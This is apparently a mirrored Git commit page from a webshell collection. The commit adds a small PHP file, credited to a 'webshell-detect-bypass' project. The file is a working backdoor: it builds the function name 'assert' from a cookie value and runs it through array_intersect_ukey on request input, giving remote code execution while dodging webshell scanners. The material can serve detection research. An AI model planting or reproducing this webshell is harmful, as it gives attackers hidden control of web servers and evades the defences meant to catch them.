mirror of
https://github.com/tennc/webshell.git
synced 2026-01-21 13:49:05 +00:00
Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
This commit is contained in:
9
php/array_intersect_ukey-cookie-ass.php
Normal file
9
php/array_intersect_ukey-cookie-ass.php
Normal file
@@ -0,0 +1,9 @@
|
||||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
$ch = $_COOKIE["set-domain-name"];
|
||||
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");
|
||||
?>
|
||||
Reference in New Issue
Block a user